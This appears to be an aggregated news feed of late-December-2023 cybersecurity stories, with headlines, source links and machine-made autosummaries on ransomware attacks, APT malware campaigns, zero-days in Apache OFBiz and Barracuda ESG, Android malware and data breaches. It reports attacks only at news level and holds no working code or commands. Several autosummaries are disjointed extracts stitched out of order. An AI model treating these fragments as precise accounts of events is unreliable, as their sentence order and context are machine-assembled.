            2023 was a big year for cybersecurity, with significant cyberattacks, data breaches, new threat groups emerging, and, of course, zero-day vulnerabilities. [...] "

Autosummary: Scattered Spider, also known as 0ktapus, Starfraud, UNC3944, and Muddled Libra, is adept at social engineering and relies on phishing, multi-factor authentication (MFA) bombing (targeted MFA fatigue), and SIM swapping to gain initial network access on large organizations. Just hours after the attack, victims began reporting in BleepingComputer's forum that files with .vmxf, .vmx, .vmdk, .vmsd, and .nvram, all files associated with VMware ESXi virtual machines, were encrypted. MGM Resorts International suffered a massive attack that impacted numerous systems, including its main website, online reservations, and in-casino services, like ATMs, slot machines, and credit card machines. 2023 was a big year for cybersecurity, with significant cyberattacks, data breaches, new threat groups emerging, and, of course, zero-day vulnerabilities. "Since we neither can nor wish to meet the financial demands of the criminal hackers for a ransom, CloudNordic's IT team and external experts have been working intensively to assess the damage and determine what could be recovered," reads CloudNordic's statement (machine translated) "Sadly, it has been impossible to recover more data, and the majority of our customers have consequently lost all their data with us. MOVEit Transfer is a managed file transfer (MFT) solution developed by Ipswitch, a subsidiary of US-based Progress Software Corporation, that allows the enterprise to securely transfer files between business partners and customers using SFTP, SCP, and HTTP-based uploads. "


            Beware: Scam-as-a-Service Aiding Cybercriminals in Crypto Wallet-Draining Attacks

            financial ciber
            2023-12-30 https://thehackernews.com/2023/12/beware-scam-as-service-aiding.html
            Cybersecurity researchers are warning about an increase in phishing attacks that are capable of draining cryptocurrency wallets. "These threats are unique in their approach, targeting a wide range of blockchain networks, from Ethereum and Binance Smart Chain to Polygon, Avalanche, and almost 20 other networks by using a crypto wallet-draining technique," Check Point researchers Oded Vanunu, "

            Autosummary: "These threats are unique in their approach, targeting a wide range of blockchain networks, from Ethereum and Binance Smart Chain to Polygon, Avalanche, and almost 20 other networks by using a crypto wallet-draining technique," Check Point researchers Oded Vanunu, Dikla Barda, and Roman Zaikin said. "


            New Black Basta decryptor exploits ransomware flaw to recover files

            exploits ransomware
            2023-12-30 https://www.bleepingcomputer.com/news/security/new-black-basta-decryptor-exploits-ransomware-flaw-to-recover-files/
            Researchers have created a decryptor that exploits a flaw in Black Basta ransomware, allowing victims to recover their files for free. [...] "

            Autosummary: "So the ransomware destroyed the MBR or GPT partition table, but tools such as "testdisk" can often recover or re-generate those." For files that do not contain large zero-byte chunks of data, SRLabs says it may still be possible to recover files if you have an older unencrypted version with similar data. Black Basta encrypted file showing the encryption key Source: BleepingComputer While decrypting smaller files may not be possible, larger files like virtual machine disks can usually be decrypted, as they contain a large number of "zero-byte" sections. "


            INC RANSOM ransomware gang claims to have breached Xerox Corp

            exploits ransomware
            2023-12-30 https://securityaffairs.com/156679/cyber-crime/inc-ransom-ransomware-xerox-corp.html
            The INC RANSOM ransomware group claims to have hacked the American multinational corporation Xerox Corp. Xerox Corp provides document management solutions worldwide. The company’s Document Technology segment offers desktop monochrome and color printers, multifunction printers, copiers, digital printing presses, and light production devices; and production printing and publishing systems for the graphic communications marketplace and […] "

            Autosummary: "


            Microsoft Disables MSIX App Installer Protocol Widely Used in Malware Attacks

            exploits
            2023-12-29 https://thehackernews.com/2023/12/microsoft-disables-msix-app-installer.html
            Microsoft on Thursday said it’s once again disabling the ms-appinstaller protocol handler by default following its abuse by multiple threat actors to distribute malware. “The observed threat actor activity abuses the current implementation of the ms-appinstaller protocol handler as an access vector for malware that may lead to ransomware distribution,” the Microsoft Threat Intelligence "

Autosummary: At least four different financially motivated hacking groups have been observed taking advantage of the App Installer service since mid-November 2023, using it as an entry point for follow-on human-operated ransomware activity - Storm-0569, an initial access broker which propagates BATLOADER through search engine optimization (SEO) poisoning with sites spoofing Zoom, Tableau, TeamViewer, and AnyDesk, and uses the malware to deliver Cobalt Strike and handoff the access to Storm-0506 for Black Basta ransomware deployment. "


            The top 4 ransomware gang failures of 2023

            exploits ransomware
            2023-12-29 https://www.malwarebytes.com/blog/business/2023/12/the-top-4-ransomware-gang-failures-of-2023
Ransomware gangs don't always win, and when they don't, it feels pretty great. "

Autosummary: On September 14, Caesar’s Entertainment reported in a filing with the US Securities and Exchange Commission that it, too, had suffered a cyber breach, and according to reporting from CNBC, it received a $30 million ransom demand, which it then negotiated down by about 50 percent. The Royal Mail rep is direct, says they work in IT, and, curiously, has a deft command of flattery, referring to LockBit’s work as “pen-testing.” MGM Resorts International later provided a sober estimation of the cost of the recovery effort, expecting a $100 million loss to its third-quarter results, and valid criticism about the hotelier’s security vulnerabilities remain, but in the land of vice and greed, stopping a ransomware gang is a feat that few have accomplished. “It has come to our attention that MeridianLink, in light of a significant breach compromising customer data and operational information, has failed to file the requisite disclosure under Item 1.05 of Form 8-K within the stipulated four business days, as mandated by the new SEC rules,” ALPHV allegedly wrote in their complaint to the SEC. Within days of Royal Mail’s announcement, news outlets began linking the alleged cyber incident to the ransomware gang LockBit, which, oddly, denied the attack. "


            CERT-UA Uncovers New Malware Wave Distributing OCEANMAP, MASEPIE, STEELHOOK

            exploits
            2023-12-29 https://thehackernews.com/2023/12/cert-ua-uncovers-new-malware-wave.html
            The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information. The activity, which was detected by the agency between December 15 and 25, 2023, targets government entities "

            Autosummary: "


            Malware abuses Google OAuth endpoint to ‘revive’ cookies, hijack accounts

            exploits
            2023-12-29 https://www.bleepingcomputer.com/news/security/malware-abuses-google-oauth-endpoint-to-revive-cookies-hijack-accounts/
Multiple information-stealing malware families are abusing an undocumented Google OAuth endpoint named "MultiLogin" to restore expired authentication cookies and log into users' accounts, even if an account's password was reset. [...] "

Autosummary: [Figure: Using token:GAIA pairs read from a text file to generate requests to MultiLogin. Source: CloudSEK] In a discussion with CloudSEK researcher Pavan Karthick, BleepingComputer was told they reverse-engineered the exploit and were able to use it to regenerate expired Google authentication cookies. "


            Albanian Parliament and One Albania Telecom Hit by Cyber Attacks

            Telcos
            2023-12-29 https://thehackernews.com/2023/12/albanian-parliament-and-one-albania.html
            The Assembly of the Republic of Albania and telecom company One Albania have been targeted by cyber attacks, the country’s National Authority for Electronic Certification and Cyber Security (AKCESK) revealed this week. “These infrastructures, under the legislation in force, are not currently classified as critical or important information infrastructure,” AKCESK said. One Albania, which has "

            Autosummary: "


            Russia-linked APT28 used new malware in a recent phishing campaign

            financial exploits
            2023-12-29 https://securityaffairs.com/156623/apt/apt28-phishing-new-malware.html
            Ukraine’s CERT (CERT-UA) warned of a new phishing campaign by the APT28 group to deploy previously undocumented malware strains. The Computer Emergency Response Team of Ukraine (CERT-UA) warned of a new cyber espionage campaign carried out by the Russia-linked group APT28 (aka “Forest Blizzard”, “Fancybear” or “Strontium”). The group employed previously undetected malware such as […] "

            Autosummary: The Computer Emergency Response Team of Ukraine (CERT-UA) warned of a new cyber espionage campaign carried out by the Russia-linked group APT28 (aka “Forest Blizzard”, “Fancybear” or “Strontium”). "


            Argentina pulls out of plans to join Brics bloc

            latam industry
            2023-12-29 https://www.bbc.co.uk/news/world-latin-america-67842992?at_medium=RSS&at_campaign=KARANGA
            It had been due in a few days to join the group, seen as a counterweight to the Western-led world. "

            Autosummary: "


            The Week in Ransomware - December 29th 2023 - LockBit targets hospitals

            exploits ransomware
            2023-12-29 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-29th-2023-lockbit-targets-hospitals/
It's been a quiet week, with even threat actors appearing to take some time off for the holidays. We did not see much research released on ransomware this week, with most of the news focusing on new attacks and LockBit affiliates increasingly targeting hospitals. [...] "

Autosummary: Contributors and those who provided new ransomware information and stories this week include: @malwrhunterteam, @serghei, @demonslay335, @BleepinComputer, @Ionut_Ilascu, @Seifreed, @fwosar, @LawrenceAbrams, @billtoulas, @MsftSecIntel, @DarkWebInformer, @BrettCallow, @pcrisk, and @Fortinet. December 29th, 2023 Two not-for-profit hospitals in New York are seeking a court order to retrieve data stolen in an August ransomware attack that's now stored on the servers of a Boston cloud storage company. "


            Cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania

            Telcos
            2023-12-29 https://securityaffairs.com/156644/security/cyber-attacks-hit-albania.html
            Cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania, a government agency reported. Albania’s National Authority for Electronic Certification and Cyber Security (AKCESK) revealed that cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania. The telecom carrier disclosed the cyber attack with a […] "

Autosummary: Cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania Pierluigi Paganini December 29, 2023 Cyber attacks hit the Assembly of the Republic of Albania and telecom company One Albania, a government agency reported. “Yesterday, on December 25, AKCESK was notified of cyber attacks that occurred on the ONE telephone company and the Assembly of the Republic of Albania.” reads the announcement published by AKCESK. "


            Unveiling the true cost of healthcare cybersecurity incidents

            ciber
            2023-12-28 https://www.helpnetsecurity.com/2023/12/28/cost-healthcare-cyber-incidents/

            As healthcare organizations increasingly rely on interconnected systems, electronic health records, and telemedicine, the industry becomes a prime target for malicious actors seeking to exploit vulnerabilities. The consequences of a cybersecurity breach in healthcare are not only measured in compromised data but also in jeopardized patient safety and trust. In this article, you will find excerpts from cybersecurity-focused surveys conducted in the healthcare sector we covered in 2023. By utilizing this data, your security team … More

            The post Unveiling the true cost of healthcare cybersecurity incidents appeared first on Help Net Security.

            "

            Autosummary: "


            5 pivotal cybersecurity trends for 2024

            ciber
            2023-12-28 https://www.helpnetsecurity.com/2023/12/28/2024-cyberattacks-trends/

            In 2023, cyberattacks surged both in terms of frequency and sophistication. The proliferation of cutting-edge hacking tools and technologies – now more accessible than ever thanks to advances in generative AI – created an environment conducive for cyber threats to flourish, forcing organizations to adopt proactive measures to keep their digital assets secure. Heading into 2024, the attack surface is set to expand even further, with threats likely to grow more and more elusive. Considering … More

            The post 5 pivotal cybersecurity trends for 2024 appeared first on Help Net Security.

            "

            Autosummary: Deepfakes and multi-modal ML models: The evolution of deception Staying in the AI realm, multi-modal machine learning models have granted attackers the capacity to generate convincing audio, images, and videos to trick unsuspecting employees. Just this past summer, threat actors used a malicious open-source program known as TeamsPhisher to send phishing lures to unsuspecting users via Microsoft Teams to perpetrate subsequent cyber-strikes, including ransomware attacks. "


            Antony Blinken leads officials to Mexico as US seeks to stem migration

            latam
            2023-12-28 https://www.bbc.co.uk/news/world-us-canada-67829682?at_medium=RSS&at_campaign=KARANGA
The top US diplomat meets with Mexico's president amid a surge in migration across the shared border. "

            Autosummary: "


            4 sneaky scams from 2023

            financial
            2023-12-28 https://www.malwarebytes.com/blog/personal/2023/12/4-sneaky-scams-from-2023
            Online scams abound every day, but these four scams from 2023 were particularly devious. "

            Autosummary: But in 2023, that changed, when Swift began her “Eras” tour, a globe-spanning celebration of her past albums that, on stage, delighted audiences for three-and-a-half hours every night, no matter the weather. The “logout king” gets pinned In March, the reporting outlet ProPublica revealed that, after months of investigation, it had likely tracked down one of the most notorious online scammers—the self-proclaimed “log-out king,” also known as OBN Brandon. With every visit to a compromised website, a user is surreptitiously “fingerprinted”—if their IP address, computer environment, and cyber-defenses (or lack thereof) are all preferable to the hackers behind Wooflocker, then those website visitors are redirected to another domain with a URL that is created then and there by Wooflocker’s hacking scripts. Sprung just before Black Friday, this scam had it all—the urgency of an annual mega-shopping event, the name of a recognized and trusted online retailer, and the allure of a once-benign product now launched into viral celebrity. "


            New Rugmi Malware Loader Surges with Hundreds of Daily Detections

            exploits
            2023-12-28 https://thehackernews.com/2023/12/new-rugmi-malware-loader-surges-with.html
            A new malware loader is being used by threat actors to deliver a wide range of information stealers such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms. Cybersecurity firm ESET is tracking the trojan under the name Win/TrojanDownloader.Rugmi. "This malware is a loader with three types of components: a downloader that downloads an "

            Autosummary: "This malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on the disk," the company said in its Threat Report H2 2023. "


            Experts warn of critical Zero-Day in Apache OfBiz

            exploits
            2023-12-28 https://securityaffairs.com/156530/security/apache-ofbiz-auth-bypass.html
            Experts warn of a zero-day flaw that affects Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system. Experts warn of an authentication bypass zero-day flaw that affects Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system. An attacker can trigger the vulnerability, tracked as CVE-2023-51467, to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF) […] "

            Autosummary: "


Most Sophisticated iPhone Hack Ever Exploited Apple's Hidden Hardware Feature

            exploits
            2023-12-28 https://thehackernews.com/2023/12/most-sophisticated-iphone-hack-ever.html
            The Operation Triangulation spyware attacks targeting Apple iOS devices leveraged never-before-seen exploits that made it possible to even bypass pivotal hardware-based security protections erected by the company. Russian cybersecurity firm Kaspersky, which discovered the campaign at the beginning of 2023 after becoming one of the targets, described it as "

Autosummary: (Addressed in iOS 16.6) It's worth noting that patches for CVE-2023-41990 were released by Apple in January 2023, although details about the exploitation were only made public by the company on September 8, 2023, the same day it shipped iOS 16.6.1 to resolve two other flaws (CVE-2023-41061 and CVE-2023-41064) that were actively abused in connection with a Pegasus spyware campaign." "Hardware security very often relies on "security through obscurity," and it is much more difficult to reverse-engineer than software, but this is a flawed approach, because sooner or later, all secrets are revealed. "


            Kroll reveals FTX customer info exposed in August data breach

            financial
            2023-12-28 https://www.bleepingcomputer.com/news/security/kroll-reveals-ftx-customer-info-exposed-in-august-data-breach/
            Risk and financial advisory company Kroll has released additional details regarding the August data breach, which exposed the personal information of FTX bankruptcy claimants. [...] "

            Autosummary: "This letter provides important information that can help protect you and your digital assets against misuse of your personal data, including your name, email address, phone number, address, claim number, claim amount, FTX account ID, and/or coin holdings and balances, as well as, for a limited number of individuals, date of birth," the company said in letters sent earlier this month and spotted by Emsisoft threat analyst Brett Callow. "


            Russian military hackers target Ukraine with new MASEPIE malware

            exploits rusia-ucrania
            2023-12-28 https://www.bleepingcomputer.com/news/security/russian-military-hackers-target-ukraine-with-new-masepie-malware/
Ukraine's Computer Emergency Response Team (CERT) is warning of a new phishing campaign that allowed Russia-linked hackers to deploy previously unseen malware on a network in under one hour. [...] "

            Autosummary: "


            Apache OFBiz RCE flaw exploited to find vulnerable Confluence servers

            exploits
            2023-12-28 https://www.bleepingcomputer.com/news/security/apache-ofbiz-rce-flaw-exploited-to-find-vulnerable-confluence-servers/
            A critical Apache OFBiz pre-authentication remote code execution vulnerability is being actively exploited using public proof of concept (PoC) exploits. [...] "

Autosummary: This patch bypass is caused by flawed logic in handling empty or special parameters like "requirePasswordChange=Y." [Figure: Vulnerable authentication logic function (SonicWall)] SonicWall reported their findings to the Apache team, who quickly resolved the flaw, which they categorized as a server-side request forgery (SSRF) problem. "


            Lockbit ransomware attack interrupted medical emergencies gang at a German hospital network

            exploits ransomware
            2023-12-28 https://securityaffairs.com/156545/cyber-crime/lockbit-ransomware-hit-german-hospital-network-network.html
            A Lockbit ransomware attack against the German hospital network Katholische Hospitalvereinigung Ostwestfalen (KHO) caused service disruptions at three hospitals. German hospital network Katholische Hospitalvereinigung Ostwestfalen (KHO) announced it has suffered service disruptions at three hospitals (Bielefeld, Rheda-Wiedenbrück, and Herford) after a Lockbit ransomware attack. The security incident could have a serious impact on the local […] "

Autosummary: Lockbit ransomware attack interrupted medical emergencies gang at a German hospital network Pierluigi Paganini December 28, 2023 A Lockbit ransomware attack against the German hospital network Katholische Hospitalvereinigung Ostwestfalen (KHO) caused service disruptions at three hospitals. "


            Game mod on Steam breached to push password-stealing malware

            exploits
            2023-12-28 https://www.bleepingcomputer.com/news/security/game-mod-on-steam-breached-to-push-password-stealing-malware/
            Downfall, a fan expansion for the popular Slay the Spire indie strategy game, was breached on Christmas Day to push Epsilon information stealer malware using the Steam update system. [...] "

            Autosummary: Once installed on a compromised computer, the malware will collect cookies and saved passwords and credit cards from web browsers (Google Chrome, Yandex, Microsoft Edge, Mozilla Firefox, Brave, Vivaldi), as well as Steam and Discord info. "


            Eagers Automotive halts trading in response to cyberattack

            industry ciber
            2023-12-28 https://www.bleepingcomputer.com/news/security/eagers-automotive-halts-trading-in-response-to-cyberattack/
            Eagers Automotive has announced it suffered a cyberattack and was forced to halt trading on the stock exchange as it evaluates the impact of the incident. [...] "

            Autosummary: Eagers Automotive is the largest operator of car dealerships in Australia and New Zealand, with over 300 selling points for brands such as Toyota, BMW, Nissan, Mercedes-Benz, Audi, Ford, VW, and Honda. "


            EasyPark discloses data breach that may impact millions of users

            financial
            2023-12-28 https://www.bleepingcomputer.com/news/security/easypark-discloses-data-breach-that-may-impact-millions-of-users/
            Parking app developer EasyPark has published a notice on its website warning of a data breach it discovered on December 10, 2023, which impacts an unknown number of its millions of users. [...] "

            Autosummary: The company's announcement mentions that some customers have had the following information compromised, depending on what they have provided to the platform: name, phone number, physical address, email address, and some digits of their credit card/debit card or IBAN. The above could help cybercriminals launch effective phishing attacks against the exposed EasyPark users, which the company warns explicitly about in the data breach notice. "


            Microsoft disables MSIX protocol handler abused in malware attacks

            exploits
            2023-12-28 https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-msix-protocol-handler-abused-in-malware-attacks/
            Microsoft has again disabled the MSIX ms-appinstaller protocol handler after multiple financially motivated threat groups abused it to infect Windows users with malware. [...] "

            Autosummary: "Since mid-November 2023, Microsoft Threat Intelligence has observed threat actors, including financially motivated actors like Storm-0569, Storm-1113, Sangria Tempest, and Storm-1674, utilizing the ms-appinstaller URI scheme (App Installer) to distribute malware," the company said. "


            Cybercriminals launched “Leaksmas” event in the Dark Web exposing massive volumes of leaked PII and compromised data

            ciber
            2023-12-28 https://securityaffairs.com/156560/deep-web/leaksmas-dark-web-data-leak.html
            Leaksmas: On Christmas Eve, multiple threat actors released substantial data leaks, Resecurity experts reported. On Christmas Eve, Resecurity, which protects Fortune 100 companies and government agencies globally, observed multiple actors on the Dark Web releasing substantial data leaks. Over 50 million records containing PII of consumers from around the world have been leaked. The actual damage resulting […] "

            Autosummary: "


            Steam game mod breached to push password-stealing malware

            exploits
            2023-12-28 https://www.bleepingcomputer.com/news/security/steam-game-mod-breached-to-push-password-stealing-malware/
            Downfall, a fan expansion for the popular Slay the Spire indie strategy game, was breached on Christmas Day to push Epsilon information stealer malware using the Steam update system. [...] "

            Autosummary: Once installed on a compromised computer, the malware will collect cookies and saved passwords and credit cards from web browsers (Google Chrome, Yandex, Microsoft Edge, Mozilla Firefox, Brave, Vivaldi), as well as Steam and Discord info. "


            Essential DDoS statistics for understanding attack impact

            industry
            2023-12-27 https://www.helpnetsecurity.com/2023/12/27/ddos-attack-2023-statistics/

            The impact of DDoS attacks extends far beyond mere inconvenience, as they can result in financial losses, compromised data, and erosion of customer trust. Understanding the nature and consequences of DDoS activity is essential for organizations and individuals alike as they strive to protect their online presence and ensure the uninterrupted flow of critical services. In this article, you will find excerpts from DDoS attack surveys we covered in 2023. This data will enable your … More

            "

            Autosummary: Global rise in DDoS attacks threatens digital infrastructure: In 2022, the total number of DDoS attacks worldwide increased by 115.1% over the amount observed in 2021, according to Nexusguard. "


            Data security and cost are key cloud adoption challenges for financial industry

            financial industry
            2023-12-27 https://www.helpnetsecurity.com/2023/12/27/financial-services-cloud-adoption/

            91% of banks and insurance companies have now initiated their cloud journey, a significant increase from 2020, when only 37% of firms had embarked on their cloud transformations, according to Capgemini. However, this high rate and its corresponding investment does not translate to effective cloud adoption at scale. More than 50% of firms surveyed have only moved a minimal portion of their core business applications to the cloud. 89% of financial services executives believe that … More

            "

            Autosummary: Cloud migration priorities include risk and customer relationship management: Industry executives surveyed in this report across health insurance, life insurance, capital markets, payments, retail banks and wealth management identify risk management and customer relationship management (CRM) among their top three areas ripe for early cloud adoption. Recently, the Digital Operational Resilience Act (DORA) mandated that financial institutions subject to European Union (EU) regulations must rigorously implement, document, and uphold the requisite systems, protocols, and tools to provide sufficient reliability, capacity, and resilience. "


            Renewable energy drive for indigenous groups in Colombia

            latam industry
            2023-12-27 https://www.bbc.co.uk/news/world-latin-america-67825466?at_medium=RSS&at_campaign=KARANGA
            Local communities and indigenous groups can now set up partnerships to produce and sell renewable energy. "

            Autosummary: "


            How ransomware operators try to stay under the radar

            exploits ransomware
            2023-12-27 https://www.malwarebytes.com/blog/ransomware/2023/12/how-ransomware-operators-try-to-stay-under-the-radar
            We look at the three most common methods that ransomware groups use to avoid being detected. "

            Autosummary: Many anti-malware solutions, including Malwarebytes, have anti-tampering protection in place, so finding methods to disable the protection is a big deal for malware authors. With valid credentials gained through vulnerability exploitation, phishing, or password attacks, the criminals get access to an internet-exposed service, where they can set up a foothold that provides them with command and control options. "


            New Sneaky Xamalicious Android Malware Hits Over 327,000 Devices

            exploits
            2023-12-27 https://thehackernews.com/2023/12/new-sneaky-xamalicious-android-malware.html
            A new Android backdoor has been discovered with potent capabilities to carry out a range of malicious actions on infected devices. Dubbed Xamalicious by the McAfee Mobile Research Team, the malware is so named for the fact that it's developed using an open-source mobile app framework called Xamarin and abuses the operating system's accessibility permissions to fulfill its objectives. "

            Autosummary: Some of the apps are listed below: Essential Horoscope for Android (com.anomenforyou.essentialhoroscope); 3D Skin Editor for PE Minecraft (com.littleray.skineditorforpeminecraft); Logo Maker Pro (com.vyblystudio.dotslinkpuzzles); Auto Click Repeater (com.autoclickrepeater.free); Count Easy Calorie Calculator (com.lakhinstudio.counteasycaloriecalculator); Sound Volume Extender (com.muranogames.easyworkoutsathome); LetterLink (com.regaliusgames.llinkgame); NUMEROLOGY: PERSONAL HOROSCOPE &NUMBER PREDICTIONS (com. "


            Warning: Poorly Secured Linux SSH Servers Under Attack for Cryptocurrency Mining

            Linux
            2023-12-27 https://thehackernews.com/2023/12/warning-poorly-secured-linux-ssh.html
            Poorly secured Linux SSH servers are being targeted by bad actors to install port scanners and dictionary attack tools with the goal of targeting other vulnerable servers and co-opting them into a network to carry out cryptocurrency mining and distributed denial-of-service (DDoS) attacks. "Threat actors can also choose to install only scanners and sell the breached IP and account credentials on "

            Autosummary: "


            A cyberattack hit Australian healthcare provider St Vincent’s Health Australia

            ciber
            2023-12-27 https://securityaffairs.com/156445/data-breach/st-vincents-health-australia-cyberattack.html
            St Vincent’s Health Australia, the largest Australian healthcare provider, suffered a data breach after a cyber attack. St Vincent’s Health Australia is the largest non-profit healthcare provider in the country. The healthcare system was hit by a cyberattack that resulted in a data breach. St Vincent’s Health Australia reported the incident to local authorities and […] "

            Autosummary: In the last couple of years, multiple prominent Australian organizations have been victims of cyberattacks, including Medibank, Energy One, Crown Resorts, Latitude Financial, Nissan Australia, DP World Australia, EnergyAustralia, and Optus. "


            Barracuda fixes new ESG zero-day exploited by Chinese hackers

            exploits
            2023-12-27 https://www.bleepingcomputer.com/news/security/barracuda-fixes-new-esg-zero-day-exploited-by-chinese-hackers/
            Network and email security firm Barracuda says it remotely patched all active Email Security Gateway (ESG) appliances on December 21 against a zero-day bug exploited by UNC4841 Chinese hackers. [...] "

            Autosummary: Second wave of zero-day attacks this year: In May, the same hacker group used another zero-day (CVE-2023-2868) to target Barracuda ESG appliances as part of a cyber-espionage campaign. "


            Chinese Hackers Exploited New Zero-Day in Barracuda's ESG Appliances

            exploits
            2023-12-27 https://thehackernews.com/2023/12/chinese-hackers-exploited-new-zero-day.html
            Barracuda has revealed that Chinese threat actors exploited a new zero-day in its Email Security Gateway (ESG) appliances to deploy a backdoor on a "limited number" of devices. Tracked as CVE-2023-7102, the issue relates to a case of arbitrary code execution that resides within a third-party and open-source library Spreadsheet::ParseExcel that's used by the Amavis scanner within the "

            Autosummary: "


            Experts analyzed attacks against poorly managed Linux SSH servers

            Linux
            2023-12-27 https://securityaffairs.com/156466/hacking/threat-actors-linux-ssh-servers-attacks.html
            Researchers warn of attacks against poorly managed Linux SSH servers that mainly aim at installing DDoS bots and CoinMiners. Researchers at AhnLab Security Emergency Response Center (ASEC) are warning about attacks targeting poorly managed Linux SSH servers, primarily focused on installing DDoS bots and CoinMiners. In the reconnaissance phase, the threat actors perform IP scanning […] "

            Autosummary: Experts analyzed attacks against poorly managed Linux SSH servers, Pierluigi Paganini, December 27, 2023. Researchers warn of attacks against poorly managed Linux SSH servers that mainly aim at installing DDoS bots and CoinMiners. "


            Mortgage firm LoanCare warns 1.3 million people of data breach

            financial
            2023-12-27 https://www.bleepingcomputer.com/news/security/mortgage-firm-loancare-warns-13-million-people-of-data-breach/
            Mortgage servicing company LoanCare is warning 1,316,938 borrowers across the U.S. that their sensitive information was exposed in a data breach at its parent company, Fidelity National Financial. [...] "

            Autosummary: "


            Panasonic discloses data breach after December 2022 cyberattack

            financial ciber
            2023-12-27 https://www.bleepingcomputer.com/news/security/panasonic-discloses-data-breach-after-december-2022-cyberattack/
            Panasonic Avionics Corporation, a leading supplier of in-flight communications and entertainment systems, disclosed a data breach affecting an undisclosed number of individuals after its corporate network was breached more than one year ago, in December 2022. [...] "

            Autosummary: "


            New Xamalicious Android malware installed 330k times on Google Play

            exploits
            2023-12-27 https://www.bleepingcomputer.com/news/security/new-xamalicious-android-malware-installed-330k-times-on-google-play/
            A previously unknown Android backdoor named "Xamalicious" has infected approximately 338,300 devices via malicious apps on Google Play, Android's official app store. [...] "

            Autosummary: The most popular of the Xamalicious apps are the following: Essential Horoscope for Android (100,000 installs); 3D Skin Editor for PE Minecraft (100,000 installs); Logo Maker Pro (100,000 installs); Auto Click Repeater (10,000 installs); Count Easy Calorie Calculator (10,000 installs); Dots: One Line Connector (10,000 installs); Sound Volume Extender (5,000 installs). Also, a separate set of 12 malicious apps carrying the Xamalicious threat, for which download stats aren't available, are distributed on unofficial third-party app stores, infecting users via downloadable APK (Android package) files. "


            Critical Zero-Day in Apache OfBiz ERP System Exposes Businesses to Attack

            exploits
            2023-12-27 https://thehackernews.com/2023/12/critical-zero-day-in-apache-ofbiz-erp.html
            A new zero-day security flaw has been discovered in Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system, that could be exploited to bypass authentication protections. The vulnerability, tracked as CVE-2023-51467, resides in the login functionality and is the result of an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) that was "

            Autosummary: "


            Barracuda fixed a new ESG zero-day exploited by Chinese group UNC4841

            exploits
            2023-12-27 https://securityaffairs.com/156502/breaking-news/barracuda-fixed-a-new-esg-zero-day-exploited-by-chinese-group-unc4841.html
            Security firm Barracuda addressed a new zero-day, affecting its Email Security Gateway (ESG) appliances, that is actively exploited by the China-linked UNC4841 group. On December 21, network and email cybersecurity firm Barracuda started releasing security updates to address a zero-day, tracked as CVE-2023-7102, in Email Security Gateway (ESG) appliances. The vulnerability has been actively exploited by […] "

            Autosummary: Barracuda fixed a new ESG zero-day exploited by Chinese group UNC4841, Pierluigi Paganini, December 27, 2023. Security firm Barracuda addressed a new zero-day, affecting its Email Security Gateway (ESG) appliances, that is actively exploited by the China-linked UNC4841 group. “In our ongoing investigation, Barracuda has determined that a threat actor has utilized an Arbitrary Code Execution (ACE) vulnerability within a third party library, Spreadsheet::ParseExcel, to deploy a specially crafted Excel email attachment to target a limited number of ESG devices,” reads the advisory. "


            Lockbit ransomware disrupts emergency care at German hospitals

            exploits ransomware
            2023-12-27 https://www.bleepingcomputer.com/news/security/lockbit-ransomware-disrupts-emergency-care-at-german-hospitals/
            German hospital network Katholische Hospitalvereinigung Ostwestfalen (KHO) has confirmed that recent service disruptions were caused by a Lockbit ransomware attack where the threat actors gained access to IT systems and encrypted devices on the network. [...] "

            Autosummary: "


            Ohio Lottery hit by cyberattack claimed by DragonForce ransomware

            exploits ransomware ciber
            2023-12-27 https://www.bleepingcomputer.com/news/security/ohio-lottery-hit-by-cyberattack-claimed-by-dragonforce-ransomware/
            The Ohio Lottery was forced to shut down some key systems after a cyberattack affected an undisclosed number of internal applications on Christmas Eve. [...] "

            Autosummary: Not much is known about the DragonForce ransomware gang, and while they are a new operation, their tactics, negotiation style, and data leak site indicate an experienced extortion group. "


            Xamalicious Android malware distributed through the Play Store

            exploits
            2023-12-27 https://securityaffairs.com/156514/malware/xamalicious-android-backdoor.html
            Researchers discovered a new Android malware dubbed Xamalicious that can take full control of the device and perform fraudulent actions. McAfee Mobile Research Team discovered a new Android backdoor dubbed Xamalicious that can take full control of the device and perform fraudulent actions. The malware has been implemented with Xamarin, an open-source framework that allows […] "

            Autosummary: Most of the infections are in the USA, Brazil, Argentina, the UK, Spain, and Germany. “Android applications written in non-Java code with frameworks such as Flutter, React Native and Xamarin can provide an additional layer of obfuscation to malware authors that intentionally pick these tools to avoid detection and try to stay under the radar of security vendors and keep their presence on apps markets,” concludes the report. "


            3 main tactics attackers use to bypass MFA

            industry
            2023-12-26 https://www.helpnetsecurity.com/2023/12/26/tactics-bypass-mfa/

            Notable security breaches have bypassed MFA to compromise taxi broker Uber, games company EA, and authentication business Okta, according to SE Labs. CISOs must bolster MFA protections: SE Labs advised CISOs to step up their efforts against attacks on systems protected by MFA in response to increased attacker activity to exploit failure points. As is often the case when compromising systems, attackers have not reinvented the wheel to circumvent MFA, or 2FA (two-factor authentication), as it … More

            "

            Autosummary: “MFA is still one of the best security measures people can use since the password was invented, but as organisations shore up their defences deploying it, so attackers are switching tactics and working hard to find ways around it,” says Simon Edwards, CEO of SE Labs. "


            Rising fintech trends for 2024: From A2A payments to GenAI in banking

            financial
            2023-12-26 https://www.helpnetsecurity.com/2023/12/26/fintech-trends-2024/

            The fintech market is undergoing a rapid shift, with the rise of new technologies, such as Open Finance, generative AI and A2A (Account-to-Account) payments having a major impact on business models, according to Juniper Research. This is combined with unprecedented competition to be ‘top of wallet’ for customers, making the market more competitive and uncertain than ever. Economic pressures, an accelerating shift from cards, and the need for differentiation are key drivers that will lead … More

            "

